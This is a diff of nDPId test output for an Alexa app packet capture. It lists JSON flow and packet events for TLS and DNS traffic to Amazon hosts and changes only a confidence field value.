-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1490976041150,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976041150,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWlNAAEARM1+sECrYrBAqAdZmADUALY4\/ocgBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041150,"flow_last_seen":1490976041150,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976041150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1490976041151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976041151,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR0jdAAEARu2qsECoBrBAq2AA11mYAPRDBociBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAUABDRe6IY="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976041151,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041156,"flow_last_seen":1490976041156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041156,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1490976041156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041156,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TnBAAEAG+H6sECrYNF7ohrJdAbvhYQATAAAAAKAC\/\/9vSwAAAgQFtAQCCAoA9k5jAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1490976041212,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041212,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwBzRAAOcGmMY0XuiGrBAq2AG7sl2f4NcN4WEAFHASH\/5jwQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1490976041215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041215,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTnFAAEAG+JGsECrYNF7ohrJdAbvhYQAUn+DXDlAQAVeuMgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041156,"flow_last_seen":1490976041217,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976041217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -159,82 +159,82 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": 